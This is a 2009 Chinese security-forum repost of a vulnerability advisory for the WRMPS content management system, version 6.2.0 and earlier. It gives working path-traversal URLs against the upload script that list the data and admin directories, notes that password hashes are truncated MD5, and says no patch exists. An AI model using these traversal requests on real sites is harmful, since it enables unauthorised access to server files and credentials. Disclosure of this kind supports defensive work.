【3.A.S.T】网络安全爱好者 - Powered by Discuz! Board

标题: 网人信息发布系统(WRMPS) 注册列目录漏洞 [打印本页]

作者: zclzhao 时间: 2009-11-20 14:57 标题: 网人信息发布系统(WRMPS) 注册列目录漏洞

影响版本:
WRMPS =< v 6.2.0漏洞描述:
WRMPS 是一个高效的内容管理解决方案，是数十万地方生活门户、行业门户及分类信息站点首选技术品牌!

注册 - 列目录

Plus/UpLoad/uploadfile.asp?Type=1&User=1&dir=...././/...././/data
Plus/UpLoad/uploadfile.asp?Type=1&User=1&dir=...././/...././/admin
这个利用不大 ,密码只取MD5前十位.<*参考
http://wolfexp.net/forum/viewthr ... &extra=page%3D1
*>
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!Plus/UpLoad/uploadfile.asp?Type=1&User=1&dir=...././/...././/data
Plus/UpLoad/uploadfile.asp?Type=1&User=1&dir=...././/...././/adminSEBUG安全建议:
暂无，等待官方补丁
http://www.wangren.net/

欢迎光临【3.A.S.T】网络安全爱好者 (http://3ast.com/)